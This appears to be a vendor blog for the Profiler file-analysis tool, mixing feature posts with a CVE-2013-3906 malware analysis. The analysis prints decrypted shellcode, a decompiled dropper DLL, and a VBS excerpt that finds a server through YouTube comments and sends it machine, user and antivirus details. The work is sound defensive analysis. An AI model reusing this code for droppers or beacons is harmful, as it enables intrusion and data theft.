Command-line scripting

The upcoming 2.1 version of Profiler adds support for command-line scripting. This is extremely useful as it enables users to create small (or big) utilities using the SDK and also to integrate those utilities in their existing tool-chain.

The syntax to run a script from command-line is the following:

cerpro.exe -r foo.py

If we want to run a specific function inside a script, the syntax is:

cerpro.exe -r foo.py:bar

This calls the function ‘bar’ inside the script ‘foo.py’.

Everything following the script/function is passed on as argument to the script/function itself.

cerpro.exe -r foo.py these "are arguments" for the script

When no function is specified, the arguments can be retrieved from sys.argv.

import sys

print(sys.argv)

For the command-line above the output would be:

['script/path/foo.py', 'these', 'are arguments', 'for', 'the', 'script']

When a function is specified, the number of arguments are passed on to the function directly:

# cerpro.exe -r foo.py:sum 1 2

def sum(a, b):
    print(int(a) + int(b))

If you actually try one of these examples, you’ll notice that Profiler will open its main window, focus the output view and you’ll see the output of the Python print functions in there. The reason for this behaviour is that the command-line support also allows us to instrument the UI from command-line. If we want to have a real console behaviour, we must also specify the ‘-c’ parameter. Remember we must specify it before the ‘-r’ one as otherwise it will be consumed as an argument for the script.

cerpro.exe -c -r foo.py:sum 1 2

However, on Windows you won’t get any output in the console. The reason for that is that on Windows applications can be either console or graphical ones. The type is specified statically in the PE format and the system acts accordingly. There are some dirty tricks which allow to attach to the parent’s console or to allocate a new one, but neither of those are free of glitches. We might come up with a solution for this in the future, but as for now if you need output in console mode on Windows, you’ll have to use another way (e.g. write to file). Of course, you can also use a message box.

from Pro.Core improt *

proCoreContext().msgBox(MBIconInfo, "hello world!")

But a message box in a console application usually defies the purpose of a console application. Again, this issue affects only Windows.

So, let’s write a small sample utility. Let’s say we want to print out all the import descriptor module names in a PE. Here’s the code:

from Pro.Core import *
from Pro.PE import *

def printImports(fname):
    c = createContainerFromFile(fname)
    pe = PEObject()
    if not pe.Load(c):
        return
    it = pe.ImportDescriptors().iterator()
    while it.hasNext():
        descr = it.next()
        offs = pe.RvaToOffset(descr.Num("Name"))
        name, ret = pe.ReadUInt8String(offs, 200)
        if ret:
            print(name.decode("ascii"))

Running the code above with the following command line:

cerpro.exe -r pestuff.py:printImports C:\Windows\regedit.exe

Produces the following output:

ADVAPI32.dll
KERNEL32.dll
GDI32.dll
USER32.dll
msvcrt.dll
api-ms-win-core-path-l1-1-0.dll
SHLWAPI.dll
COMCTL32.dll
COMDLG32.dll
SHELL32.dll
AUTHZ.dll
ACLUI.dll
ole32.dll
ulib.dll
clb.dll
ntdll.dll
UxTheme.dll

Of course, this is not a very useful utility. But it’s just an example. It’s also possible to create utilities which modify files. There are countless utilities which can be easily written.

Another important part of the command-line support is the capability to register logic providers on the fly. Which means we can force a custom scan logic from the command-line.

from Pro.Core import *
import sys

ctx = proCoreContext()

def init():
    ctx.getSystem().addFile(sys.argv[1])
    return True

def end(ud):
    pass
    
def scanning(sp, ud):
    pass

def scanned(sp, ud):
    pass
    
def rload():
    ctx.unregisterLogicProvider("test_logic")

ctx.registerLogicProvider("test_logic", init, end, scanning, scanned, rload)
ctx.startScan("test_logic")

This script scans a single file given to it as argument. All callbacks, aside from init, are optional (they default to None).

That’s all! Expect the new release soon along with an additional supported platform. 🙂

Profiler 2.0

The new version 2.0 is out! The most important news is that we have a new online store, which allows orders from individuals and not only from organizations. If you’re not yet one of our customers, make sure to test out our trial. 🙂

We now offer 2 type of licenses Home/Academic and Commercial. Also, the price of the commercial license has been reduced. The reason for this is that we stripped active support from the license cost (we now offer support only in the advanced version). After 2 years on the road we had very few support requests and so it made sense to make licenses cheaper by removing the costs of support.

We’re currently finishing to port Profiler to Linux and OSX, so these platforms will be available soon. The current change-list reflects the changes in licensing and our cross-platform effort:

– switched to Visual Studio 2013
– updated Qt to 5.2.1
– updated Python to 3.4
– updated SQLite3
– updated OpenSSL
– switched from the XED2 to the Capstone disasm engine
– added disasm filters for ARM, Thumb, ARM64, MIPS, PowerPC and 8086
– implemented some custom view notifications in Python
– added UI controls to custom views
– made layouts available in the context of the main window
– improved Python SDK
– fixed many small issues

We switched to Qt 5, so PySide is unfortunately no longer supported. On the other hand the SDK now allows to build complex UIs. In fact, we fixed lots of minor issues in the SDK. The reason for that is that in the last months we had to offer a lot of SDK support and so we had to postpone many new features. The upside is that our SDK has become much more robust.

We also changed our licensing schema, which is no longer year-based, but version based. To compensate current customers for the lack of updates in the last months, we have renewed for free their license for the 2.x series. If you’re an active customer and you haven’t received your new license, please contact us!

Analysis of CVE-2013-3906 (TIFF)

This is just a demonstration of malware analysis with Profiler, I haven’t looked into previous literature on the topic. So, perhaps there’s nothing new here, but I hope it will be of help for our users.

We open the main DOCX file. The first embedded file we analyze is the TIFF image, which stands out because it’s the only image.

TIFF directories

Among the directories we have two which specify an embedded JPEG. So we just select the data area according to the offset and length value and load it as an embedded JPEG (it’s a good idea to do this automatically in the future: bear with us, TIFF support has been just introduced).

JPEG data

JPEG embedded

Now we can inspect the embedded JPEG.

JPEG meta

The JPEG looks strange. Even by looking at the format fields, it looks malformed. Given certain anomalies we can suppose that the TIFF might be used as some sort of vector for something. Let’s keep that in mind and let’s take a look at other files. Two of them stand out: they have a .bin extension and are CFBFs (same format as DOC files).

CFBF Foreign

We immediately notice various problems. Foreign data is abundant and the file looks malformed. More alarmingly lots of shellcode warnings are reported. Let’s look at a random one (they are all the same basically).

CFBF Shellcode

Let’s start with the analysis of this shellcode.

; nop slide
00001000:  nop 
00001001:  nop 
00001002:  nop 
00001003:  nop 

; decryption code
00001004:  and sp, 0xfffc
00001009:  jmp 0x101c
0000100B:  pop ebx
0000100C:  dec ebx                         ; address of 1020
0000100D:  xor ecx, ecx
0000100F:  or cx, 0x27e                    ; ecx = 0x27E
00001014:  xor byte ptr [ebx+ecx*1], 0xee  ; xor every byte with 0xEE
00001018:  loop 0x1014
0000101A:  jmp 0x1021
0000101C:  call 0x100b

The start of the shellcode is just a decryption loop which xors every byte following the last call with 0xEE. So, that’s exactly what we’re going to do. We select 0x27E bytes after the last call, then we press Ctrl+T to open the filters view.

Decrypt shellcode

We use two filters: ‘misc/basic‘ to xor the bytes and ‘disasm/x86‘ to disassemble them.

At this point it’s useful to load the shellcode into a debugger. So let’s select the decrypted shellcode and press Ctrl+R and activate the ‘Shellcode to executable‘ action:

Shellcode to executable

The options dialog will pop up.

Shellcode to executable options

After pressing OK, the debugger will be executed. Depending on your debugger, put a break-point on the beginning of the shellcode and run the code.

The start of the shellcode resolves API addresses:

; resolve APIs
00001021:  jmp 0x1252
00001026:  pop edi                         ; edi = 0x1257
00001027:  mov eax, dword ptr fs:[0x30]
0000102D:  mov eax, dword ptr [eax+0xc]
00001030:  mov esi, dword ptr [eax+0x1c]
00001033:  lodsd dword ptr [esi]
00001034:  mov ebp, dword ptr [eax+0x8]
00001037:  mov esi, dword ptr [eax+0x20]
0000103A:  mov eax, dword ptr [eax]
0000103C:  cmp byte ptr [esi], 0x6b        ; 'k'
0000103F:  jnz 0x1034
00001041:  inc esi
00001042:  inc esi
00001043:  cmp byte ptr [esi], 0x65        ; 'e'
00001046:  jnz 0x1034
00001048:  inc esi
00001049:  inc esi
0000104A:  cmp byte ptr [esi], 0x72        ; 'r'
0000104D:  jnz 0x1046
0000104F:  inc esi
00001050:  inc esi
00001051:  cmp byte ptr [esi], 0x6e        ; 'n'
00001054:  jnz 0x1046
00001056:  mov esi, edi                    ; esi = 0x1257
00001058:  push 0x12
0000105A:  pop ecx
0000105B:  call 0x120d
00001060:  loop 0x105b

This code basically retrieves the base of ‘kernel32.dll‘ and then resolves API address by calling 0x120d for 0x12 times (which is the amount of APIs to be resolved).

This is the function which resolves API names hashes to addresses:

; retrieve API from hash
0000120D:  push ecx
0000120E:  push esi
0000120F:  mov esi, dword ptr [ebp+0x3c]
00001212:  mov esi, dword ptr [esi+ebp*1+0x78]
00001216:  add esi, ebp
00001218:  push esi
00001219:  mov esi, dword ptr [esi+0x20]
0000121C:  add esi, ebp
0000121E:  xor ecx, ecx
00001220:  dec ecx
00001221:  inc ecx
00001222:  lodsd dword ptr [esi]
00001223:  add eax, ebp
00001225:  xor ebx, ebx
00001227:  movsx edx, byte ptr [eax]
0000122A:  cmp dl, dh
0000122C:  jz 0x1236
0000122E:  ror ebx, 0xd
00001231:  add ebx, edx
00001233:  inc eax
00001234:  jmp 0x1227
00001236:  cmp ebx, dword ptr [edi]
00001238:  jnz 0x1221
0000123A:  pop esi
0000123B:  mov ebx, dword ptr [esi+0x24]
0000123E:  add ebx, ebp
00001240:  mov cx, word ptr [ebx+ecx*2]
00001244:  mov ebx, dword ptr [esi+0x1c]
00001247:  add ebx, ebp
00001249:  mov eax, dword ptr [ebx+ecx*4]
0000124C:  add eax, ebp
0000124E:  stosd dword ptr [edi]
0000124F:  pop esi
00001250:  pop ecx
00001251:  ret 

The API hashes are stored at the end of the shellcode. Here are the hashes and the resolved APIs:

; API hashes

Offset     0 1 2 3

00000000  33CA8A5B ; GetTempPathA
00000004  03B8E331 ; FreeLibraryAndExitThread
00000008  A517007C ; CreateFileA
0000000C  FB97FD0F ; CloseHande
00000010  1F790AE8 ; WriteFile
00000014  02FA0DE6 ; GetCurrentProcessId
00000018  EDDF54E4 ; CreateToolhelp32Snapshot
0000001C  EAB63BB8 ; Thread32First
00000020  08D6FE86 ; Thread32Next
00000024  DC2C8C0E ; SuspendThread
00000028  6F1EC958 ; OpenThread
0000002C  9EF9BB35 ; GetCurrentThreadId
00000030  8E4E0EEC ; LoadLibraryA
00000034  A0D5C94D ; FreeLibrary
00000038  AC08DA76 ; SetFilePointer
0000003C  AD9B7DDF ; GetFileSize
00000040  54CAAF91 ; VirtualAlloc
00000044  1665FA10 ; ReadFile

We can actually close the debugger now. Once the API names are known, it’s easy to continue the analysis statically.

The next step in the shellcode is to suspend all other threads in the current process:

; suspend all threads in the current process
00001062:  call dword ptr [esi+0x14]       ; GetCurrentProcessId
00001065:  mov ebx, eax
00001067:  call dword ptr [esi+0x2c]       ; GetCurrentThreadId
0000106A:  push eax
0000106B:  sub esp, 0x1c
0000106E:  xor eax, eax
00001070:  push eax
00001071:  push 0x4
00001073:  call dword ptr [esi+0x18]       ; CreateToolhelp32Snapshot
00001076:  cmp eax, 0xffffffff
00001079:  jz 0x10bf
0000107B:  mov edi, esp
0000107D:  mov dword ptr [edi], 0x1c
00001083:  push eax
00001084:  mov eax, dword ptr [esp]
00001087:  push edi
00001088:  push eax
00001089:  call dword ptr [esi+0x1c]       ; Thread32First
0000108C:  test eax, eax
0000108E:  jz 0x10bc
00001090:  mov eax, dword ptr [edi+0xc]
00001093:  cmp eax, ebx
00001095:  jnz 0x10b0
00001097:  mov eax, dword ptr [edi+0x8]
0000109A:  cmp eax, dword ptr [esp+0x20]
0000109E:  jz 0x10b0
000010A0:  push eax
000010A1:  xor eax, eax
000010A3:  push eax
000010A4:  push 0x1fffff
000010A9:  call dword ptr [esi+0x28]       ; OpenThread
000010AC:  push eax
000010AD:  call dword ptr [esi+0x24]       ; SuspendThread
000010B0:  mov eax, dword ptr [esp]
000010B3:  push edi
000010B4:  push eax
000010B5:  call dword ptr [esi+0x20]       ; Thread32Next
000010B8:  test eax, eax
000010BA:  jnz 0x1090
000010BC:  call dword ptr [esi+0xc]        ; CloseHande

It then looks for the handle in the current process for the main DOCX file:

; find handle to the current docx:
; it sets the file pointer to 0x20 and reads 4 bytes, it compares them to 0x6f725063
; here's the hex view of the initial bytes:
;
; Offset     0  1  2  3  4  5  6  7    8  9  A  B  C  D  E  F     Ascii   
;
; 00000000  50 4B 03 04 14 00 06 00   08 00 00 00 21 00 56 0B     PK..........!.V.
; 00000010  6D 97 7C 01 00 00 CE 02   00 00 10 00 08 01 64 6F     m.|...........do
; 00000020  63 50 72 6F                                           cPro
;           
000010BF:  xor ebx, ebx
000010C1:  add ebx, 0x4
000010C4:  cmp ebx, 0x100000
000010CA:  jnbe 0x1155
000010D0:  xor eax, eax
000010D2:  push eax
000010D3:  push eax
000010D4:  mov al, 0x20
000010D6:  push eax
000010D7:  push ebx
000010D8:  call dword ptr [esi+0x38]       ; SetFilePointer
000010DB:  cmp eax, 0xffffffff
000010DE:  jz 0x10c1
000010E0:  xor eax, eax
000010E2:  push eax
000010E3:  push ebx
000010E4:  call dword ptr [esi+0x3c]       ; GetFileSize
000010E7:  cmp eax, 0x1000
000010EC:  jl 0x10c1
000010EE:  mov edi, eax
000010F0:  sub esp, 0x4
000010F3:  mov ecx, esp
000010F5:  sub esp, 0x4
000010F8:  mov edx, esp
000010FA:  xor eax, eax
000010FC:  push eax
000010FD:  push ecx
000010FE:  push 0x4
00001100:  push edx
00001101:  push ebx
00001102:  call dword ptr [esi+0x44]      ; ReadFile
00001105:  test eax, eax
00001107:  pop eax
00001108:  pop ecx
00001109:  jz 0x10c1
0000110B:  cmp eax, 0x6f725063
00001110:  jnz 0x10c1

It reads the entire file (minus the first 0x24 bytes) into memory and looks for a certain signature:

; read the entire file apart the first 0x24 bytes
00001112:  sub edi, 0x24                  ; subtract from files size the initial bytes
00001115:  push 0x4
00001117:  push 0x3000
0000111C:  push edi
0000111D:  push 0x0
0000111F:  call dword ptr [esi+0x40]      ; VirtualAlloc
00001122:  sub esp, 0x4
00001125:  mov ecx, esp
00001127:  push 0x0
00001129:  push ecx
0000112A:  push edi
0000112B:  push eax
0000112C:  mov edi, eax                   ; edi = buffer
0000112E:  push ebx
0000112F:  call dword ptr [esi+0x44]      ; ReadFile
00001132:  test eax, eax
00001134:  pop edx
00001135:  jz 0x1155

; find 0xb19b00b5 in the buffer
00001137:  mov eax, 0xb19b00b5
0000113C:  inc edi
0000113D:  dec edx
0000113E:  test edx, edx
00001140:  jle 0x1155
00001142:  cmp dword ptr [edi], eax
00001144:  jnz 0x113c
00001146:  add edi, 0x4                   ; buffer += 4
00001149:  sub edx, 0x4
0000114C:  cmp dword ptr [edi], eax       ; repeat compare
0000114E:  jnz 0x113c
00001150:  add edi, 0x4                   ; buffer += 4
00001153:  jmp 0x119f                     ; jump to decryption
00001155:  mov bx, cs
00001158:  cmp bl, 0x23
0000115B:  jnz 0x1163
0000115D:  xor edx, edx
0000115F:  push edx
00001160:  push edx
00001161:  push edx
00001162:  push edx
00001163:  mov edx, 0xfffff
00001168:  or dx, 0xfff
0000116D:  inc edx
0000116E:  push edx
0000116F:  cmp bl, 0x23
00001172:  jz 0x118d
00001174:  push 0x2
00001176:  pop eax
00001177:  int 0x2e
00001179:  pop edx
0000117A:  cmp al, 0x5
0000117C:  jz 0x1168
0000117E:  mov eax, 0xb19b00b5
00001183:  mov edi, edx
00001185:  scasd dword ptr [edi]
00001186:  jnz 0x116d
00001188:  scasd dword ptr [edi]
00001189:  jnz 0x116d
0000118B:  jmp 0x119f
0000118D:  push 0x26
0000118F:  pop eax
00001190:  xor ecx, ecx
00001192:  mov edx, esp
00001194:  call dword ptr fs:[0xc0]
0000119B:  pop ecx
0000119C:  pop edx
0000119D:  jmp 0x117a

It creates a new file in the temp directory:

0000119F:  sub esp, 0xfc
000011A5:  mov ebx, esp
000011A7:  push ebx
000011A8:  push 0xfc
000011AD:  call dword ptr [esi]            ; GetTempPathA
000011AF:  mov dword ptr [ebx+eax*1], 0x6c2e61
000011B6:  xor eax, eax
000011B8:  push eax
000011B9:  push 0x2
000011BB:  push 0x2
000011BD:  push eax
000011BE:  push eax
000011BF:  push 0x40000000
000011C4:  push ebx
000011C5:  call dword ptr [esi+0x8]        ; CreateFileA
000011C8:  mov edx, eax
000011CA:  push edx
000011CB:  push edx
000011CC:  push ebx

Now comes the juicy part. It reads few parameters after the matched signature, including a size parameter, and uses these parameters to decrypt a region of data:

; read decryption parameters
000011CD:  mov al, byte ptr [edi]
000011CF:  inc edi
000011D0:  mov bl, byte ptr [edi]
000011D2:  inc edi
000011D3:  mov ecx, dword ptr [edi]
000011D5:  push ecx
000011D6:  add edi, 0x4
000011D9:  push edi
; decryption loop
000011DA:  mov dl, byte ptr [edi]
000011DC:  xor dl, al
000011DE:  mov byte ptr [edi], dl
000011E0:  inc edi
000011E1:  add al, bl
000011E3:  dec ecx
000011E4:  test ecx, ecx
000011E6:  jnz 0x11da

Let’s select in the hex view the same region (we find the start address by looking for the signature just as the shellcode does).

Encrypted payload

Then we press Ctrl+E to add an embedded file and we click on filters. Since the decryption routine is too complex to be expressed through a simple filter, we have finally a good reason to use a Lua filter, in particular the ‘lua/custom‘ one.

Lua custom filter

As you can see, a sample stub is already provided when clicking on the script value in the options. We have to modify it only slightly for our purposes.

function run(filter)
    local c = filter:container()
    local size = c:size()
    local offset = 0
    local bsize = 16384
    local al = 0x3A
    local bl = 0x9E
    while size ~= 0 do
        if bsize > size then bsize = size end
        local block = c:read(offset, bsize)
        local boffs = 0
        while boffs < bsize do
            local dl = block:readU8(boffs)
            dl = bit.bxor(dl, al)
            block:writeU8(boffs, dl)
            boffs = boffs + 1
            al = bit.band(al + bl, 0xFF)
        end
        c:write(offset, block)
        offset = offset + bsize
        size = size - bsize
    end
    return Base.FilterErr_None
end

By clicking on preview, we can see that the file start with a typical MZ header. Thus, we can specify a PE file when loading the payload.

PE payload

By inspecing the PE file we can see that it's a DLL among other things. Now, before analyzing the DLL, let's finish the shellcode analysis.

The payload is now decrypted. So the shellcode just writes it to the temporary file, loads the DLL, unloads it and then terminates the current thread.

000011E8:  pop edi
000011E9:  pop ecx
000011EA:  pop ebx
000011EB:  pop edx
000011EC:  sub esp, 0x4
000011EF:  mov eax, esp
000011F1:  push 0x0
000011F3:  push eax
000011F4:  push ecx
000011F5:  push edi
000011F6:  push edx
000011F7:  call dword ptr [esi+0x10]       ; WriteFile
000011FA:  pop eax
000011FB:  call dword ptr [esi+0xc]        ; CloseHande
000011FE:  push ebx
000011FF:  call dword ptr [esi+0x30]       ; LoadLibraryA
00001202:  push eax
00001203:  call dword ptr [esi+0x34]       ; FreeLibrary
00001206:  xor eax, eax
00001208:  push eax
00001209:  push eax
0000120A:  call dword ptr [esi+0x4]        ; FreeLibraryAndExitThread

That's it. Now we can go back to the payload dll.

One of the resources embedded in the PE file is a DOCX.

Payload DOCX

Probably a sane document to re-open in a reader to avoid making the user suspicious of a document which didn't open.

There's another suspicious embedded resource, but before making hypotheisis about it, let's do a complete analysis of the DLL, (don't worry: it's very small). For this purpose I used IDA Pro and the decompiler.

It starts with the DllMain:

BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  if ( fdwReason == 1 )
    sub_10001030(hinstDLL);
  return 1;
}

The called function:

HRSRC __cdecl sub_10001030(HMODULE hModule)
{
  HRSRC result; // eax@6
  HRSRC hResInfo; // [sp+0h] [bp-10h]@1
  HRSRC hResInfoa; // [sp+0h] [bp-10h]@6
  HGLOBAL hResData; // [sp+4h] [bp-Ch]@2
  void *hResDataa; // [sp+4h] [bp-Ch]@7
  const void *lpBuffer; // [sp+8h] [bp-8h]@3
  const void *lpBuffera; // [sp+8h] [bp-8h]@8
  DWORD nNumberOfBytesToWrite; // [sp+Ch] [bp-4h]@3
  DWORD nNumberOfBytesToWritea; // [sp+Ch] [bp-4h]@8

  hResInfo = FindResourceA(hModule, "ID_RES1", (LPCSTR)0xA);
  if ( hResInfo )
  {
    hResData = LoadResource(hModule, hResInfo);
    if ( hResData )
    {
      nNumberOfBytesToWrite = SizeofResource(hModule, hResInfo);
      lpBuffer = LockResource(hResData);
      if ( lpBuffer )
        sub_10001200(lpBuffer, nNumberOfBytesToWrite);
      FreeResource(hResData);
    }
  }
  result = FindResourceA(hModule, "ID_RES2", (LPCSTR)0xA);
  hResInfoa = result;
  if ( result )
  {
    result = LoadResource(hModule, result);
    hResDataa = result;
    if ( result )
    {
      nNumberOfBytesToWritea = SizeofResource(hModule, hResInfoa);
      lpBuffera = LockResource(hResDataa);
      if ( lpBuffera )
        sub_10001120(lpBuffera, nNumberOfBytesToWritea);
      result = (HRSRC)FreeResource(hResDataa);
    }
  }
  return result;
}

It basically retrieves both embedded resources and then performs some stuff with both of them. First we take a look at what it does with the DOCX resource:

char *__cdecl sub_10001200(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
{
  char *result; // eax@10
  int hObject; // [sp+0h] [bp-63Ch]@1
  void *hObjecta; // [sp+0h] [bp-63Ch]@20
  DWORD Type; // [sp+4h] [bp-638h]@1
  int Buffer; // [sp+8h] [bp-634h]@6
  const CHAR CmdLine; // [sp+Ch] [bp-630h]@21
  DWORD cbData; // [sp+210h] [bp-42Ch]@1
  const CHAR ExistingFileName; // [sp+214h] [bp-428h]@19
  LPCSTR lpNewFileName; // [sp+31Ch] [bp-320h]@11
  DWORD NumberOfBytesWritten; // [sp+320h] [bp-31Ch]@4
  CHAR Filename; // [sp+324h] [bp-318h]@21
  HKEY hKey; // [sp+524h] [bp-118h]@9
  DWORD v14; // [sp+528h] [bp-114h]@4
  BYTE Data; // [sp+52Ch] [bp-110h]@10
  unsigned int v16; // [sp+634h] [bp-8h]@1
  char *v17; // [sp+638h] [bp-4h]@19
  int v18; // [sp+63Ch] [bp+0h]@1

  v16 = (unsigned int)&v18 ^ __security_cookie;
  cbData = 260;
  Type = 1;
  hObject = 0;
  while ( 1 )
  {
    hObject += 4;
    if ( hObject > 1048576 )
      break;
    if ( SetFilePointer((HANDLE)hObject, 32, 0, 0) != -1 )
    {
      v14 = GetFileSize((HANDLE)hObject, &NumberOfBytesWritten);
      if ( v14 != -1 )
      {
        if ( (signed int)v14 >= 4096
          && ReadFile((HANDLE)hObject, &Buffer, 4u, &NumberOfBytesWritten, 0)
          && Buffer == 1869762659 )
          break;
      }
    }
  }
  if ( RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Office\.0\\Word\\File MRU", 0, 0x20019u, &hKey) )
  {
    result = (char *)sub_10001530(hObject, (char *)&Data);
    if ( result )
      return result;
    lpNewFileName = (LPCSTR)&Data;
  }
  else
  {
    if ( RegQueryValueExA(hKey, "Item 1", 0, &Type, &Data, &cbData) )
    {
      result = (char *)sub_10001530(hObject, (char *)&Data);
      if ( result )
        return result;
      lpNewFileName = (LPCSTR)&Data;
    }
    else
    {
      RegCloseKey(hKey);
      lpNewFileName = strchr((const char *)&Data, '*');
      if ( lpNewFileName )
      {
        ++lpNewFileName;
      }
      else
      {
        result = (char *)sub_10001530(hObject, (char *)&Data);
        if ( result )
          return result;
        lpNewFileName = (LPCSTR)&Data;
      }
    }
  }
  CloseHandle((HANDLE)hObject);
  DeleteFileA(lpNewFileName);
  GetTempPathA(0x104u, (LPSTR)&ExistingFileName);
  result = strrchr(lpNewFileName, '\\');
  v17 = result;
  if ( result )
  {
    ++v17;
    strcat((char *)&ExistingFileName, v17);
    result = (char *)CreateFileA(&ExistingFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
    hObjecta = result;
    if ( result != (char *)-1 )
    {
      WriteFile(result, lpBuffer, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
      CloseHandle(hObjecta);
      GetModuleFileNameA(0, &Filename, 0x200u);
      sprintf((char *)&CmdLine, "%s /q /t \"%s\"", &Filename, &ExistingFileName);
      WinExec(&CmdLine, 5u);
      result = (char *)CopyFileA(&ExistingFileName, lpNewFileName, 0);
    }
  }
  return result;
}

As hypothized previously, it just launches a new instance of the current process with the sane DOCX this time.

Now let's take a look at what it does with the resource we haven't yet identified:

HANDLE __cdecl sub_10001120(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
{
  HANDLE result; // eax@1
  const CHAR Parameters; // [sp+0h] [bp-210h]@1
  HANDLE hObject; // [sp+100h] [bp-110h]@1
  DWORD NumberOfBytesWritten; // [sp+104h] [bp-10Ch]@2
  CHAR Directory; // [sp+108h] [bp-108h]@1
  unsigned int v7; // [sp+20Ch] [bp-4h]@1
  int v8; // [sp+210h] [bp+0h]@1

  v7 = (unsigned int)&v8 ^ __security_cookie;
  GetTempPathA(0x100u, &Directory);
  GetTempPathA(0x100u, (LPSTR)&Parameters);
  strcat((char *)&Parameters, "1.vbe");
  result = CreateFileA(&Parameters, 0x40000000u, 0, 0, 2u, 2u, 0);
  hObject = result;
  if ( result != (HANDLE)-1 )
  {
    WriteFile(hObject, lpBuffer, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
    CloseHandle(hObject);
    result = ShellExecuteA(0, "open", "cscript.exe", &Parameters, &Directory, 0);
  }
  return result;
}

It dumps it to file (with a vbe extension) and then executes it with 'cscript.exe'. I actually didn't know about VBE files: they're just encoded VBS files. To decode it I used an online tool by GreyMagic.

VBE resource

The VBS code is quite easy to read and quite boring. The only interesting part in my opinion is the update mechanism.

It basically looks for certain comments in two YouTube pages with a regex. The url captured by the regex is then used to perform the update.

Dim YouTubeLinks(1)
YouTubeLinks(0) = "http://www.youtube.com/watch?v=DZZ3tTTBiTs"
YouTubeLinks(1) = "http://www.youtube.com/watch?v=ky4M9kxUM7Y"

Rem [...]

	while serverExists = 0
		Dim min, max
		min = 0
		max = 1
		Randomize
		
		randLink = YouTubeLinks(Int((max-min+1)*Rnd+min))
		
		outputHTML = getPage(randLink, 60)
		
		Set objRE = New RegExp
		With objRE
			.Pattern = "just something i made up for fun, check out my website at (.*) bye bye"
			.IgnoreCase = True
		End With

		Set objMatch = objRE.Execute( outputHTML )

		If objMatch.Count = 1 Then
			server = objMatch.Item(0).Submatches(0)
		End If
		
		server = "http://" & server
		
		if getPage(server & "/Status.php", 30) = "OK" Then
			serverExists = 1
		End if
	Wend

It sends back to the URL various information about the current machine:

	up = getPage(server & "/Up.php?sn=" & Serial & "&v=" & version & "&av=" & installedAV, 60)
Else
	while Len(Serial) <> 5
		getSerial = getPage(server & "/gsn.php?new=" & computerName & ":" & userName & "&v=" & version & "&av=" & installedAV, 60)

As a final anecdote: the main part of the script just contains an enormous byte array which is dumped to file. The file is a PNG with a RAR file appended to it which in turn contains a VBE encoding executable. The script itself doesn't seem to make use of this, so no idea why it's there.

Appended RAR

That's all. While it may seem a lot of work, writing the article took much longer than performing the actual analysis (~30 minutes, including screenshots).

We hope it may be of help or interest to someone.

News for version 1.1

And here it is.

added libmagic to the SDK
added preliminary ELF support
added TIFF support
– added GZ, BZ2 and LZMA file support
– exposed internal API for files and paths to Python
– hooks are now triggered even when loading embedded objects in the workspace
added magic info extension script
– exposed more DEX methods to Python
– remember manually enabled extensions
– capability to add individual files in the scan page
– some bug fixes

Enjoy.

TIFF Support

The upcoming 1.1 version of Profiler includes support for TIFF image files. This addition completes the list of most popular supported image formats (JPEG, PNG/APNG, GIF, BMP/DIB, TIFF). The support was actually already partially there, because the Exif format (which is just an embedded TIFF) inside of JPEG files was already supported since the first public version of Profiler, but somehow the actual TIFF support hadn’t yet been added.

Multi-page TIFF

In a few days the new version will be released.

libmagic Support

While Profiler offers an API to identify file formats, it does so only for those which are supported. The list of supported files is vast, but there will be always unrecognized formats.

It’s certainly a good idea to introduce a file signature identification API. This API might be useful for several purposes, not all foreseeable right away. That’s why the upcoming version introduces support for libmagic (it comes with the latest 5.11 version). The library is exposed to Python in the ‘Pro.magic’ module. Here are the functions:

magic_buffer(magic_t m, NTByteArray const & buf) -> char const *
magic_builtin_db_name() -> NTString
magic_check(magic_t m, char const * fname) -> int
magic_close(magic_t m)
magic_compile(magic_t m, char const * fname) -> int
magic_descriptor(magic_t m, int fd) -> char const *
magic_errno(magic_t m) -> int
magic_error(magic_t m) -> char const *
magic_file(magic_t m, char const * fname) -> char const *
magic_getpath(char const * fname, int action) -> char const *
magic_list(magic_t m, char const * fname) -> int
magic_load(magic_t m, char const * fname) -> int
magic_open(int flags) -> magic_t
magic_setflags(magic_t m, int flags) -> int

Just as a note: magic_file just calls magic_buffer internally.

Let’s create a small hook to demonstrate the use of the library, although it’s quite intuitive. Here’s the cfg entry:

[MagicInfo]
label = Magic: information provided by libmagic
file = magicinfo.py
init = init
end = end
scanning = scanning

The Python code:

from Pro.magic import *

def init():
    m = magic_open(MAGIC_CONTINUE)
    magic_load(m, magic_builtin_db_name())
    return m

def end(m):
    magic_close(m)

def scanning(sp, m):
    s = sp.getObjectStream()
    buf = s.read(0, min(0x1000, s.size()))
    info = magic_buffer(m, buf)
    if info != None:
        sp.addMetaDataString("Magic", info)

The addMetaDataString in ScanProvider adds a string in the individual file report, which is visible from the file stats page in the workspace.

So if we open a file in the workspace, we’ll get the following extra information:

libmagic

The script above will be included in the update.

ELF Support

The upcoming 1.1 version of Profiler introduces preliminary ELF support. I said preliminary as the support wasn’t originally scheduled for this version. Anyway, here are some screenshots…

Segments (called program headers in the official terminology):

Segments

Sections (object files for instance don’t contain segments):

Sections

Symbols:

Symbols

ELF was the last important executable file format missing from list of supported formats. All other formats are already supported, be they native (PE, Mach-O) or managed (.NET, Java, DEX, ActionScript2, ActionScript3).

Raw File System Analysis (FAT32 File Recovery)

This post isn’t about upcoming features, it’s about things you can already do with Profiler. What we’ll see is how to import structures used for file system analysis from C/C++ sources, use them to analyze raw hex data, create a script to do the layout work for us in the future and at the end we’ll see how to create a little utility to recover deleted files. The file system used for this demonstration is FAT32, which is simple enough to avoid making the post too long.

Note: Before starting you might want to update. The 1.0.1 version is out and contains few small fixes. Among them the ‘signed char’ type wasn’t recognized by the CFFStruct internal engine and the FAT32 structures I imported do use it. While ‘signed char’ may seem redundant, it does make sense, since C compilers can be instructed to treat char types as unsigned.

Import file system structures

Importing file system structures from C/C++ sources is easy thanks to the Header Manager tool. In fact, it took me less than 30 minutes to import the structures for the most common file systems from different code bases. Click here to download the archive with all the headers.

Here’s the list of headers I have created:

  • ext – ext2/3/4 imported from FreeBSD
  • ext2 – imported from Linux
  • ext3 – imported from Linux
  • ext4 – imported from Linux
  • fat – imported from FreeBSD
  • hfs – imported from Darwin
  • iso9660 – imported from FreeBSD
  • ntfs – imported from Linux
  • reiserfs – imported from Linux
  • squashfs – imported from Linux
